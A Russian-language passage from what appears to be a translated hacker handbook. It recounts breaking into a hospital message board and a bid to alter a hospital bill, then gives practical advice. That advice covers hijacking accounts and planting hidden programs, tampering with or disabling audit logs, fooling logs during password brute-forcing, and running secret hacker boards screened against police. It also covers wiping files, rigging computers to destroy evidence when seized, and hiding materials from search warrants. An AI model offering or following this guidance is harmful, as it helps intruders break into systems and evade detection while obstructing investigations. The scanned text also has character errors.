Я вернулся к своему компьютеру, снова вызвал GFH-NET и попробовал ввести в качестве имени “Ли Браун”. Но мне опять не повезло. Впрочем, сделав еще несколько телефонных звонков по разным телефонам данной больницы, приведенным в книге, я вышел-таки на парня, не имевшего пароля. GFH-NET, как выяснилось, не представляла собой ничего особенного. Она не имела ничего обшего с больничными счетами, записями о пациентах и т. п. Это была обычная медицинская BBS. Насколько мне удалось понять, данная система была создана для того, чтобы студенты-медики могли обсуждать различные проблемы с врачами. Никакой передачи файлов или чего-нибудь в этом роде; самая простая система сообщений. Она оказалась неинтересной, но зато было интересно в нее проникать.

На следующий день я просматривал телефонные номера врачей на желтых страницах, и нашел восемь номеров врачей Гринвудской больницы. Из них трое не имели пароля. Таким образом, я был несколько озадачен тем, что у Вороватой Милашки возникли затруднения с этим взломом. Я вызвал BBS Гринвудской больницы, в первый раз за несколько лет, и, к своему удивлению, наткнулся на такой вот угрожающий экран:

ДАННАЯ СИСТЕМА ПРЕДНАЗНАЧЕНА ТОЛЬКО ДЛЯ САНКЦИОНИРОВАННЫХ ПОЛЬЗОВАТЕЛЕЙ! ЕСЛИ ВЫ НЕ ЯВЛЯЕТЕСЬ ТАКОВЫМ, ВАМ СЛЕДУЕТ НЕЗАМЕДЛИТЕЛЬНО ОТКЛЮЧИТЬСЯ!

Всю полезную информацию как ветром сдуло! Осталась только это грозное предупреждение и бесполезное приглашение к вводу пароля. Я попытался войти под теми же именами, которыми пользовался когда-то, и обнаружил, что все они обзавелись паролями. Затем я попытался прибегнуть к социальной инженерии, но все те, с кем я разговаривал, словно воды в рот набрали. (Впоследствии мне удалось проникнуть в настоящую больничную систему с помощью нескольких милых секретарш из административного отдела.) Я отправил Вороватой Милашке ответное письмо по электронной почте, в котором спрашивал, что же там произошло. На следующий день я получил ответ

В прошлом месяце мой друг лежал в больнице, и мне захотелось взглянуть, не удастся ли изменить его счет. Я помнила, что года два тому назад плавал мне этот номер, я посмотрела в блокнот и, к своему удивлению, обнаружила, что номер по-прежнему там. Я знала, как зовут лечащего врача моего приятеля, а навещая его в больнице, я узнала еще больше из справочной системы и объявлений на стенах. Затем я пыталась войти в систему, используя все эти имена, но в это время появимся системный оператор и вышвырнул меня. И каждый раз, когда я хотела продолжить свои попытки, происходило то же самое. Но на следующее утро, около восьми часов, мне наконец удалось проникнуть в систему. Один из врачей, имя которого я использовала, вводил вместо пароля собственное имя. Ты, наверно, догадываешься, что изменить счет моего друга мне не удалось, и больше вообще ничего не удалось...после того, как я ввела имя и пароль, система просто зависла. Вечером я попыталась еще раз, и вместо запроса имени на экране появилось следующее сообщение:

БОЛЬШАЯ ЧАСТЬ ВАЖНЫХ ФАЙЛОВ БЫЛА УНИЧТОЖЕНА КЕМ-ТО ИЛИ ЧЕМ-ТО. СИСТЕМА ВРЕМЕННО ПРЕКРАЩАЕТ СВОЮ РАБОТУ— РОАЖЕР.

Через неделю я попыталась проникнуть в систему еще раз, но безуспешно. Мне кажется, системный оператор решил, что я или кто-то еще уничтожил файлы, хотя на самом деле я этого не делала. Несколько дней назад я позвонила еще раз, просто так, и увидела — ну, ты знаешь, что. Как видно, они поумнели!

Да, Милашка была права. Они действительно поумнели и усилили свою защиту. Вот почему хакерам не следует открыто подходить к системе или привлекать внимание каким-либо другим способом. На самом деле существует только один случай, когда следует обнаруживать себя системному оператору, и только тогда, когда вы уже изучили всю систему и больше никогда не собираетесь в нее возвращаться. Кое в чем Рожер и Гарольд действительно поумнели, а кое в чем нет. Я проявил некоторое упорство и снова взломал GFH-NET. Как выяснилось, я и сам малость поумнел: медицинские беседы между докторами и студентами показались мне гораздо более понятными, чем каких-то два года назад. А может, это студенты поглупели? Я увидел также старое объявление одного из системных операторов. Он рассказывал то, что ему было известно о случившемся инциденте с системой (а известно ему было немного.) Речь в основном шла о том, что определенные файлы были уничтожены, а многие объявления заменены натуралистическими описаниями особенностей женской анатомии. Автор, похоже, считал, что файлы могли быть стерты или каким-то недоумком-оператором, либо хакером-злоумышленником. После некоторых исследований я обнаружил, что, хотя Данная опция и не присутствует в меню, нажатие клавиши “F” отправляет прямо в несуществующую систему передачи файлов. Подумав несколько минут, я ясно увидел, каким образом можно было подгрузить программу уничтожения любых файлов корневой директории после перезагрузки системы. На следующий день я послал системным операторам больницы длинное письмо, в котором подробно объяснял, каким образом можно устранить данную проблему, и как ликвидировать другие прорехи в защите. Подписался я так: “Искренне ваша, полай Ваниа Хакер”. Затем я снова вызвал BBS и загрузил им свое послание. Вскоре после этого я получил сообщение от Милашки: “В больнице появился новый экран загрузки. Там написано: “СПАСИБО, ПОЛАЙ! — Р.К. и Г.Л.” Я был совершенно счастлив.

Уроки, полученные в больнице

Вы уже знаете, что системные операторы не жаждут приветствовать вас в своей системе. Поэтому-то вы и совершаете взлом. Но если вы обнаружите свое присутствие, у вас, естественно, возникнут осложнения.

Системные операторы GFH-NET чуть с ума не посходили, когда поняли, что их компьютеры взломаны, и сделали так, что проникнуть в систему стало намного труднее. В случаях с такими маленькими BBS не имеет большого значения, проникнете вы в них, или нет, но если вы имеете дело с чем-то вроде правительственной организации, дополнительные сложности вам вовсе ни к чему.

Если вы каким-то образом обнаруживаете свое присутствие — например, вводя в качестве пароля подряд все слова из словаря, и каждый раз получая сообщение “НЕПРАВИЛЬНО ВВЕДЕНЫ ВХОДНЫЕ ДАННЫЕ”, — системные операторы, как минимум, обеспокоятся. Это означает, что вам уже не удастся получить никакой информации по телефону, а также возможно изменение паролей всех легальных пользователей либо чистка неиспользуемых бюджетов, которая, впрочем, может облегчить вход. С другой стороны, если вы испытываете теплые чувства по отношению к той или иной системе, и не хотите, чтобы ей был причинен вред (и вас мало беспокоит то, что вы можете в нее никогда больше не вернуться), вы можете принять решение известить операторов обо всех маленьких недостатках, которые вы обнаружили в их замечательной системе. Во многих случаях вам просто не поверят. Они могут даже не потрудиться проверить ваши сообщения, либо потому, что уверены в собственной непогрешимости, либо потому, что примут вашу информацию за какую-то уловку, да бог знает, почему еще. Но если они действительно поверят вам и примут ваши советы, они будут весьма благодарны и, если вы попросите, наградят вас доступом невысокого уровня или сообщат какие-нибудь интересные сведения. Скажите им, что вы будете их неофициальным “советником по безопасности”. Некоторые из них с радостью примут ваше предложение, хотя остальные предпочтут больше не иметь с вами дела.

Зашита BBS

Этот раздел посвящен двум предметам безопасного использования BBS хакерами: хакер-пользователь и хакер — системный оператор. Эти две ипостаси тесно взаимосвязаны, поскольку системные операторы одной BBS могут в то же время являться пользователями других. Вы должны применять эти меры предосторожности на всех BBS, которые вы используете и запускаете, и не стоит. связываться с системами, которые не обеспечивают высокой степени хакерской безопасности.

Не помешайте сообщений, содержащих сведения о нелегальной деятельности на BBS, в безопасности которых вы не уверены полностью. Не следует также расписывать свои хакерские достижения в своей личной электронной переписке. Если вы всерьез увлечены электронными системами объявлений, постарайтесь всеми силами подружиться с “неблагонадежными” системами, если не хотите портить себе перспективу вашего дальнейшего существования в компьютерном мире. Но всегда следует убедиться, что ваши сообщения на этих досках никак не втянут вас ни во что криминальное. Поймите меня правильно. Я вовсе не утверждаю, что размещение хакерских сообщений на хакерских BBS гарантирует вам безопасность — это совсем не так. Если вы начали делиться информацией с другими хакерами на хакерской BBS, вам лучше убедиться, что системный оператор соблюдает следующие меры предосторожности: ложный фасад, спрятанные полдоски, полная двойная анонимность, шифровка и проверка намерений. Самым главным аспектом любой хакерской группы, клуба или BBS является секретность. Настоящая хакерская BBS не станет давать рекламу, поскольку не нуждается в новых членах. Хакерская BBS снаружи может казаться очень домашней, этакой семейной BBS, но стоит набрать кодовое слово, не указанное в меню, ввести один-два пароля — и вот вы вошли в секретную область. Хакерская BBS должна также заботиться о своей безопасности, разрешая вход в секретные разделы только определенным пользователям, чтобы не дать несанкционированным хакерам-пользователям или псевдо хакерам взломать ваше место сбора. Любая хакерская BBS, пренебрегающая этими простыми правилами, необходимыми, чтобы казаться легальной, является несерьезной, опасной, и с ней не следует иметь дела. Многие BBS делают еще большие с глупости — я встречал такие системы, для получения доступа в секретные разделы которых достаточно было набрать в качестве пароля слова вроде “DEATH” (“СМЕРТЬ”) или даже “PASSWORD” (“ПАРОЛЬ”). Нечего и говорить, что информация, которую можно найти на таких досках, не обладает высокой ценностью, и обычно состоит из взаимной перебранки между пользователями. Ни один новый пользователь не должен быть до-пушен на хакерскую BBS до тех пор, пока один или несколько действительных пользователей не смогут подтвердить, что он не из полиции, что он будет соблюдать принятые в данном сообществе нормы поведения, располагает полезной информацией и умеет держать язык за зубами.

В качестве системного оператора вы можете получить удовольствие, составляя список правил, определяющих процедуру приема на BBS новых членов. Помните о том, что, пока новый человек не будет принят на BBS, он не должен даже знать о ее существовании. Это позволит вам избежать встречи с полицейскими и сделать секреты системы доступными только для самых лучших хакеров. Как только новый человек будет принят, частная информация о нем должна быть стерта из памяти компьютера.

Вообще, поразмыслите о тех BBS, членом которых вы являетесь на данный момент. Нет ли среди них таких, которые могут накрыть во время полицейской облавы? Лаже если ни вы сами, ни остальные члены системы не совершают никаких нелегальных действий в данной системе, федеральным агентам на это наплевать. Если вы не хотите оказаться замешанным в деле о компьютерном преступлении, даже незначительном, попросите оператора подпольной BBS, членом которой вы являетесь, заменить вашу личную информацию — имя, адрес, телефон, — на ложную. Если вы решили распрощаться с какой-либо BBS, обязательно информируйте оператора о том, что вы хотите, чтобы ваша информация была уничтожена. (Одна из вполне законных — с точки зрения хакера, конечно, — причин для взлома BBS — именно желание убедиться, что такая информация была изменена или уничтожена.) Обязательно проделывайте все эти веши, поскольку блюстители порядка обожают заставать хакеров врасплох. В случае, если представитель закона не сомневается в том, что конкретный хакер пользовался конкретной хакерской BBS, он может и сам совершить взлом, чтобы добраться до настоящего имени этого хакера. Так или иначе, убедитесь в том, что ваши настоящие данные никогда не всплывут в мутной водице.

Прежде чем мы продолжим разговор о том, что следует делать, будучи системным оператором хакерской BBS, я хотел бы привести наглядный пример того, что случается с хакерами, которые НЕ следуют приведенным выше советам. В 1986 году в Детройте появилась BBS с простым, но высокопарным названием — “The ВоагсЬ(игра слов —доска или министерство, совет и т. п.) Аоска использовала компьютер НР2000, и влекла к себе хакеров и кракеров (а также тех, кто только хотел стать таковыми) отовсюду, 20-го августа при загрузке в систему на экране появлялось следующее сообщение:

Добро пожаловать на “осиную” BBS команды (1-ТЕАМ) МАЙКА ВЕНЛААНЛА! (Компьютерное обеспечение — BOARDSCAN) 66 мегабайт 300,1200 бод — 24 часа. V нас есть (3) линии — и ни одной занятой. 313-ХХХ—ХХХХ

Если в тот день вы вызывали систему и читали новые сообщения, вас могло удивить такое сообщение:

Лоска объявлений:

Общая информация и BBS Сообщение: 41 Заголовок: ВАС НАДУЛИ!!!

Кому: ВСЕМ

От кого: ГЛАВНЫЙ ТЕХНИК Отправлено: 8,20,86 @ 12.08 часов

Приветствуем:

Вы находитесь на THE BOARD, “осиной” BBS, оператор МАЙК ВЕНАЛАНА из команды WDIV-TV. Цель:

продемонстрировать и задокументировать существование криминальной и потенциально противозаконной деятельности хакеров и телефонных мошенников, или так называемого “хакерского сообщества”.

Благодарим вас за сотрудничество. В течение последних полутора месяцев мы получили от вас информацию всех видов, которая обнаруживает ваше участие в подделке кредитных карточек, телефонных счетов, вандализме и, возможно, в насильственном проникновении в государственные компьютеры либо компьютеры общественной безопасности. Самое главное, теперь у нас есть ваши объявления, ваши электронные адреса, и — что важнее всего — ваши НАСТОЯЩИЕ имена и адреса. Что мы собираемся со всем этим делать? Не уходите с канала News 4. Я планирую специальные серии докладов о наших экспериментах с THE BOARD, которую посещали пользователи от побережья до побережья, а также пользователи Канады в возрасте от 12 до 48 лет. Наши постоянные пользователи знали меня как ГЛАВНОГО ТЕХНИКА, не считая других ID. Ажон Максфилд из Boardscan

являлся нашим консультантом и обеспечил нам НР2000, который поддерживал это “осиное гнездо”. С помошью ретрансляции звонков и других современных средств, которые стали возможными благодаря телефонной технологии, данная BBS взаимодействовала с удаленными пользователями, находясь непосредственно здесь, в Детройте. Когда будут готовы наши доклады? Через несколько недель мы собираемся непосредственно вступить в контакт с многими из вас, подключив полицию и агентов по безопасности из компаний по производству кредитных карточек и из телефонных служб. Докладов будет чертовски много. Спасибо за помошь. И не затрудняйте себя излишним беспокойством. Помните — у нас есть ВАШИ настоящие имена.

Майк Вендланд The ,-team WDIV, Detroit, Ml.

Доска объявлений:

Основная информация и BBS Сообщение: 42 Заголовок: BOARDSCAN Кому: ВСЕМ

От кого: КОСИАЬШИК Отправлено: 8,20,86 @ 3.31 часа

Это Джон Максфилд из Boardscan (1). Приветствую! Просьба отправлять все бомбы Майку Вендлан-ду из WDIV, Detroit. Эта доска — его идея. КОСИЛЬЩИК (он же Cable Pair)

Нужны ли здесь какие-либо комментарии? Теперь вы видите, что люди, которые охотятся за хакерами — то есть, за ВАМИ, — отнюдь не просто тупые копы. Максфилд знал достаточно, чтобы придумать прозвища “k001 ”, типа Косильщика (The Reaper) и Cable Pair. Пароль для новых пользователей, желающих попасть в систему, был HEL-N555,Elite,3 — неплохой пароль, если принять во внимание его происхождение. Макс-филды разбираются в хакерстве не хуже, чем мы с вами. Они знают нашу культуру, жаргон и способ мышления. Последнее причиняет особенно много неприятностей, а значит, вам следует обладать своим собственным стилем мышления. Вы не станете хакером высшего класса, пока не научитесь полностью использовать свой здравый смысл. Помните об этом, вызывая BBS. У нас есть право запускать свои собственные BBS и обмениваться информацией с их помошью. Но информацию с хакерской доски вы вряд ли стали бы показывать своей матушке. Заявления типа “На данной BBS запрошены любые противозаконные дискуссии...” бесполезны, но они могут послужить дополнением к следующему утверждению: многие традиционные законы против хакерства говорят о “намеренном причинении вреда”. Можно ли доказать, что хакер или кракер умышленно повредил компьютер? Если вы основали хакерскую BBS или клуб, вы должны убедиться в честности намерений ее участников. Пусть они подпишут соглашение о том, что они никогда не нанесут умышленного вреда чужому компьютеру или его содержимому, что обмен информацией, которая появляется на BBS, имеет под собой исключительно познавательную цель, что никакие обсуждения нелегальной деятельности не станут преследоваться и т. д. Таким образом члены BBS будут следовать вашему своду правил “хакерского кодекса чести”, который может появляться на экране во время прохождения процедуры загрузки. Такое соглашение, возможно, и не убережет вас от столкновения с законом, но позволит вам достичь двух целей: нарушившие соглашение члены BBS будут исключаться; а судьи, благодаря ему, возможно, поверят, что ваша BBS — всего-навсего невинный кружок для людей, которых объединяет общее хобби. Системным операторам стоит заставить участников своей BBS подписать такое соглашение еще и затем, чтобы в случае рейда блюстителей закона пользователи могли на законном основании потребовать вернуть им деньги за разрушенное оборудование, потерянное время, ложные аресты, причиненное беспокойство и т. п.

Электронную почту следует всегда держать под рукой, чтобы можно было истолковать в свою пользу Акт о неприкосновенности электронных коммуникаций. Данный акт предусматривает арест каждого служителя закона, который прочтет электронную почту, являющуюся частной в течение 180 дней. Подобное же, впрочем, ждет каждого пользователя, хранящего свою почту на вашей BBS. Итак, если ваши веселые хакеры подпишут такое соглашение и у каждого пользователя будет храниться образец электронной почты (которая может обновляться каждые 180 дней), вам следует продемонстрировать все это вторгшимся на вашу территорию полицейским. Можно сделать для них специальное сообщение о том, что, в соответствии с законом, некоторые хранящиеся в данной системе материалы и электронная почта, а также сама система и компьютер, на котором она расположена, по закону являются неприкосновенной частной собственностью. Как системный оператор, можете попросить их довести до вашего сведения любую информацию о незаконной деятельности в рамках системы, если таковая будет обнаружена, поскольку вы “не потерпите подобного на своей BBS”.

Джон Максфилд, консультант по компьютерной безопасности, просматривает BBS в поисках свидетельств хакерской деятельности, а обнаружив их, информирует об этом компанию, подвергшуюся взлому. Вы сами знаете, как хрупка бывает компьютерная безопасность. Размещая сообщения или посылая электронную почту на BBS, вы словно открываете ее всему миру. Не позволяйте таким вот охотникам на хакеров копаться в ваших личных делах.

Другие меры по обеспечению безопасности в режиме онлайн

Если вы станете следовать какой-либо определенной схеме, вам станет проще жить, но зато другим будет легче найти то, что вы хотели бы спрятать, и заметить вас, когда вы предпочли бы остаться незамеченным. Один работник нефтяной компании попросил системного менеджера каждый раз до начала компьютерного сеанса устанавливать для него временные резервные записи, чтобы он мог прочесть их перед тем, как приступить к работе. Менеджер сразу заподозрил, что этот человек ищет резервные данные, которые сохраняли до него на этих лентах другие сотрудники. Этого промышленного шпиона, как и многих других, поймали из-за того, что он действовал в рамках определенных установок. Преступники, в том числе и хакеры, любят создавать планы своих действий. Но любой придуманный вам план должен содержать в себе элементы случайности. Не позволяйте себе всегда делать вызовы удаленного компьютера в одной то же время, использовать одни и те же рабочие станции или телефоны, поскольку в один прекрасный день, придя на излюбленное вами место, вы можете обнаружить, что некто поджидает вас там с парой наручников.

Однажды мне в руки попал список номеров социальной безопасности: это был первый урок в компьютерном классе, и профессор попросил студентам сделать для него список с их именами и номерами, чтобы затем создать их компьютерные бюджеты. Я подождал, пока бюджегы будут созданы, но не стал перебирать все подряд. Вместо этого я вводил новое имя через каждые несколько часов чтобы создать впечатление, что это разные люди входят в систему под своими именами. После первой загрузки система попросила меня сменить мой пароль. После этого мне удалось использовать команду изменения паролей операционной системы, чтобы настоящий пользователь смог войти в нее, введя свой номер социальной безопасности. Но в каждой из пользовательских директорий я оставил спрятанную программу, дабы позднее использовать ее для удаленного просмотра файлов и игр. Если вы попадете в ситуацию, когда будете не в состоянии сменить измененный вами пароль обратно на пароль легального пользователя, попытайтесь снова ввести пароль, подобный номеру социальной безопасности — например, 123-45-6780 вместо 123-45-6789, словно вводивший пароль ошибся клавишей. Переходя от одного взломанного бюджета к следующему, важно изменить также свой образ действия. Как вам известно, оказавшись в системе, следует постараться создать новый бюджет для себя. Но всегда используйте разное имя и пароль, причем вводимые данные должны иметь как можно меньше отношения к реальным данным о вашей персоне.

Журналы регистрации (Log-файлы)

Вам не составит труда заставить производителей продукции по компьютерной защите послать вам по электронной почте всю информацию об их товарах. Аля меня имеет значение, в основном, такое программное обеспечение, которое незаметно следит за тем, что происходит в системе, проверяет ресурсы системы на предмет неправильного и беспорядочного использования и ведет журнал регистрации на диске или в распечатках. Сотрудник компании может заглянуть в журнал и сказать себе: “Ого! М-р Полтри каждый раз входит в систему в три часа ночи. Странно... Надо бы поговорить с ним...” Внезапно вы оказываетесь в опасной ситуации, даже не зная об этом.

Производя исследования конкретного компьютера, который вы собираетесь взломать, вы узнаете, какие из программ компьютерной зашиты используются в данном случае (можно узнать об этом у системных операторов, прикинувшись консультантом по компьютерам, или зайти в библиотеку компании и заглянуть в справочник). Закажите у производителя программ по защите образцы его продукции, чтобы “знать своего врага в лицо”. Журналы регистрации могут предупреждать администраторов обо всех ваших привычках. Даже если вы не собираетесь обзаводиться привычками, вы, возможно, станете причиной каких-либо проблем, что также будет отражено в журнале регистрации. Если вы не собираетесь немедленно покидать взломанный компьютер, а, например, хотите выходить из него в сеть, вы должны обнаружить следящую программу компьютерной зашиты и

обезвредить ее. Не стоит разрушать такую программу, просто перепрограммируйте ее так, чтобы она оставляла без внимания ваш вход в систему. Иди выясните, каким образом она ведет запись происходящего и посмотрите нельзя ли уничтожить записи вашей деятельности. Если вы сможете это сделать — прекрасно, значит, вам, скорее всего, достался корневой доступ. Если вы в течение некоторого времени загружались одним и тем же образом, вам надо изменить соответствующие записи, чтобы создать впечатление случайности при прохождении входных процедур. Возможно, вам также удастся использовать команду установки времени или даты, чтобы в свою очередь следить за следящей программой.

ВНИМАНИЕ!

Очень многие хакеры, пытаясь осторожно отредактировать записи следящей программы со своими действиями, обнаруживали к своему ужасу, что уничтожили больше, чем

требовалось. Другие пытались оказать помощь, очищая грязную программу и т. п., что приводило к различным несчастьям. Всегда создавайте резервные копии, особенно на компьютерах, которые принадлежат не вам. Если вам необходимо изменить чужой файл, изменяйте его копию. Затем убедитесь, что сделали все правильно, и только после этого уничтожайте оригинал и переименовывайте копию.

Одни из простейших задач, которую выполняют большинство следящих программ и многие средства зашиты ОС — запись неудачных попыток входа в систему. Аля того, чтобы узнать, каким образом избранный вами компьютер реагирует на неправильные входные данные, вам опять же понадобятся исследования. Некоторые программы позволяют сделать три-четыре попытки ввода комбинации имя, пароль, после чего перезагружаются, сохраняя последнюю попытку. В этом случае вместо ввода последнего пароля лучше нажать Control-C или что-то другое, позволяющее вернуться к предыдущему уровню взаимодействия.

Следящие программы могут стать досадной помехой при такой большой работе, как атака с помощью грубой силы. Если получится, попробуйте написать программу для перебора паролей так, чтобы обмануть журнал регистрации. Можно обратиться прямо к аппаратному обеспечению, или, в зависимости от того, какие веши записывает журнал, переименовать могущие показаться подозрительными команды.

Распечатанные журналы являются большой проблемой. Можно попытаться изменить записи на ленте или диске, но что если программа зашиты одновременно делает распечатку происходящего? Тут-то ничего уже не исправишь. Не допускайте ошибок. Ограничьте подозрительную деятельность до тех пор, пока не сможете вывести из строя принтер. Возможно, вам удастся запрограммировать принтер на печать несуществующим шрифтом, или если принтер цветной, на печать таким цветом, которого нет на ленте или картридже. Конечно, если вы действуете по телефонной линии, вам неизвестно, какое оборудование используется. Впрочем, существует еще возможность заставить компьютер выводить данные на другой, несуществующий принтер. Иногда удается даже заставить компьютер думать, что он выводит данные на принтер, в то время как они идут через его модем — в таком случае, вы будете получать репортажи о своей собственной деятельности.

Более неприятная разновидность журналов регистрации ведет запись: кто из пользователей что сделал, когда и почему. В некоторых компаниях сотрудники заносят в журнал все телефонные звонки, а каждый месяц сравнивают сделанные записи с телефонными счетами. Если вы проникнете в офис и станете делать удаленные вызовы, вас легко обнаружат. Лаже если вы занимаетесь этим дома, или в телефонной будке, журнал может вас засечь. Компании могут заносить в журнал приход и уход сотрудников и то, как используется оборудование. В этом случае нельзя допустить ни малейшей ошибки.

“В людях” и на местности

Занятия хакерством на людях — взлом общественных компьютеров или терминалов, социальная инженерия, даже исследования в библиотеке, и т. п., — гораздо опаснее, нежели занятия хакерством у себя дома. В этом случае появляется дополнительная опасность того, что вас узнают или арестуют.

Выбирая место для “публичного” хакерства, используйте проверенные взломшические уловки. Когда взломщик входит в дом, он прежде всего находит все выходы. Не садитесь за компьютер, от которого можно убежать только в одном направлении. Взломщик всегда рад любому кусту, за которым можно спрятаться; постарайтесь выбрать компьютер, который был бы каким-то образом “спрятан”, если за спиной у вас будет стена, а впереди — что-то еще, никто не сможет заглянуть вам через плечо.

Никогда не позволяйте себе забыть, где вы находитесь, увлекшись работой. Ведь именно это и происходит с обычными пользователями, когда вы занимаетесь “подглядыванием через плечо”. Хакер должен думать о безопасности больше, чем легальный пользователь. Приготовьте правдоподобную историю на случай, если вас заметят. Одевайтесь соответственно случаю, и всегда в чистую одежду. Наконец, помните, что в компьютерном зале почти всегда найдется хотя бы один хакер или кракер. Опасайтесь “подглядывателей” и прочих хитрецов. Сидя за общественным компьютером, я всегда несколько раз нажимаю клавишу “Break” перед окончательной загрузкой, на случай, если кто-то установил поддельную программу-ловушку. При выходе тоже соблюдайте осторожность. Некоторые терминалы снабжены буфером экрана. Этот буфер после выхода из системы часто не очищается сразу, и вы можете со спокойной душой выйти из-за компьютера, оставив на нем запись всех проделанных вами действий.

Связь с компъютером прервана: минмизация потерь

Но что, если все эти советы вам не помогут, и вас все-таки поймают? Стоит подготовиться к такому повороту событий, чтобы блюстители закона не могли найти, в чем бы вас обвинить.

Сопровождение вашего компьютера

Следует регулярно просматривать файлы, хранящиеся на вашем компьютере, и уничтожать те, которые вы незаконно присвоили. Не просто стирайте их: записывайте на их место тексты, состоящие из единственного повторяющегося символа, шифруйте самыми сложными ключами, и только затем стирайте. Можно использовать программу “Wipefile”. Тогда компьютерным копам не к чему будет придраться. Помните, что иногда куски файлов теряются, или отрываются от основной части, или дублируются где-нибудь на диске. Регулярно ишите таких “сироток” и стирайте их, если они содержат что-то нелегальное. Любой файл, который вы не можете просто уничтожить, надо шифровать и, в идеале, скрывать под не вызывающим подозрений именем.

На вашем компьютере могут быть и другие веши, которые можно использовать в качестве обвинения против вас: терминальные программы, автонаборы, базы данных с номерами модемов и кодов доступа, списки номеров BBS и т. п. Чтобы сделать их безопасными, наряду с программными “замками” на своем компьютере я использую замки физические.

Прежде чем начать работу, мои компьютеры проверяют, был ли набран на клавиатуре определенный ключ. Если компьютер загружается, не обнаружив ключа, он знает: что-то не так. Тогда он вызывает подпрограмму времени и даты, которая показывает правильное время и дату, тем самым давая мне возможность откорректировать их. Я должен ввести определенные время и дату, в противном же случае компьютер выдаст сообщение “ИДЕТ ЗАГРУЗКА МЕНЮ” и перенесет директорию, в которой я храню все свои безобразия. Там тоже будет открытое меню, но в него никто не сможет войти или выйти из него, не введя правильный пароль. К счастью, мои компьютеры ни разу не конфисковали. Если это произойдет, мне жаль того простака, которому придется продираться сквозь насаженные мною дебри; все мои системы настроены на уничтожение незаконного содержимого в определенных ситуациях. Даже если он подготовится к этому, он не сможет узнать, как это предотвратить!

Как хранить остальные материалы

Если у служителя закона имеется ордер на ваш арест, он сможет совершенно легально забрать все ваши компьютеры, периферийное оборудование, чистые дискеты и аудиокассеты, коммерческое программное обеспечение и документацию, распечатки, телефоны и т. п. — любое электронное оборудование, равно как и любые бумаги, подтверждающие, что вы являетесь владельцем этого оборудования, книги, журналы — все, что угодно. Именно так и происходит во время полицейских рейдов. Вдобавок, если преступления, в которых вы подозреваетесь, связаны с конкретным местом или человеком, у вас заберут любые свидетельства того, что существует связь между этим местом, или личностью, и совершенным преступлением. Ордера на арест пишутся специально для того, чтобы узаконить захват такого количества предметов, и будьте уверены — они возьмут все, что захотят. И не рассчитывайте, что вам хоть что-то вернут. Именно поэтому вначале я упоминал, что хакеру необязательно иметь собственный компьютер.

Печально, но факт — вам лучше всего прятать свое имущество, когда вы не находитесь дома или не пользуетесь им. Распечатки и заметки лучше хранить в папках с названиями типа “Школьные сочинения”, написанными крупными буквами, — тогда они, может быть, и не привлекут внимания. Весьма распространен миф о том, что компьютерные распечатки якобы не могут использоваться на суде в качестве вещественного доказательства, т. к. их легко подделать. На самом деле распечатки являются таким же доказательством, как и любые другие записи, если удастся доказать, что они были сделаны во время подготовки или совершения незаконных действий. Распечатки, сделанные позднее, и не вами, доказательством не являются. Но, с другой стороны, если в памяти вашего компьютера хранятся свидетельства ваших незаконных действий, блюстители закона найдут способ представить их суду в качестве доказательства. (Правда, они настолько любят разбивать конфискованные компьютеры, что вам, право же, не о чем беспокоиться!)

Пряча свое имущество, важно сделать так, чтобы оно выглядело как нечто, не имеющее отношения к компьютерам или электронике. Офицеры полиции умудряются получать такие ордера, которые разрешают им забирать все, что имеет хотя бы отдаленное отношение к электричеству. Например, незаконная информация подпольно распространяется на аудиокасоетах. Конечно, мы поместим подобную информацию на купленные в магазине кассеты с надписями вроде “Битлз”, но копы знают об этом, и захотят забрать все наши записи, включая и те, которые выглядят совсем невинно.

Хакеры обмениваются информацией и хранят записи на дискетах. Значит, если у вас есть коробка подобных дискет, вы не можете просто наклеить на них этикетки с названиями игр — вас все равно заподозрят. К тому же, полиция вряд ли станет разбираться с надписями на дискетах. Значит, вам придется спрятать сами дискеты, способом, не имеющим отношения к технике. То же самое относится и к прочему электронному оборудованию. Так, я храню свои резервные дискеты в коробке из-под крекеров — при этом я не являюсь параноиком. Мой лаптоп хранится в большой коробке из-под хлопьев на верхней полке чулана. Мне так спокойнее. Вы уже знаете, что компании и предприятия могут оставлять ценную информацию в мусорных баках. Вам необходимо осознать, что и ваш мусор может так же пригодиться тому, кто хочет обвинить вас в компьютерном преступлении. Все подобные отходы следует сначала подвергать необратимому разрушению, а затем уносить подальше от дома. Распечатки намачивайте, и лишь затем разрывайте. Содержимое дискет шифруйте, потом уничтожайте. Дискеты размагничивайте сильным магнитом, потом крошите на куски. Это не сумасшествие — методы восстановления уничтоженной электронным способом информации существуют. После все это можно выбросить в общественный мусорный контейнер. Я не шучу! Следуйте этим советам — и на вас не навесят ярлык “похитителя промышленных секретов”!

Заключение: КАК сделать чтобы вас поймали

На этот раз я хотел бы предложить вам список методов, которые НЕ НАДО использовать, иначе у вас будут неприятности. Вот пять способов, с помощью которых можно схватить хакера за руку: 1. С помощью слежки или техническими средствами. 2. С помощью доносчика. 3. Объединив против него несколько агентств. 4. По его ошибке, или 5. Узнав его.

Вас могут поймать, выследив по телефонным линиям или другими техническими средствами, вроде журналов регистрации. Так что не оставляйте за собой следов. Все время меняйте компьютеры и телефоны, с которых вы делаете удаленные вызовы. На вас могут донести. Будьте осторожны, общаясь с другими хакерами. Не рассказывайте всем подряд о своих достижениях. Прежде всего, обращайтесь с людьми, с которыми ведете разговоры о хакерстве или вместе занимаетесь хакерством, так, как вам хотелось бы, чтобы они обращались с вами. Если на вас станут охотиться сразу много агентств, вас непременно поймают. Не крадите, не разрушайте, не занимайтесь вандализмом. У хакеров и так неважная репутация, в основном, потому, что большинство пытающихся практиковать хакерство — это прыщавые псевдоанархисты старшего школьного возраста. Если вы соблюдаете хакерскую этику, на вас не станут устраивать травлю. Вас могут поймать из-за вашей собственной ошибки. Ошибкой является несоблюдение нижеследующих предосторожностей.

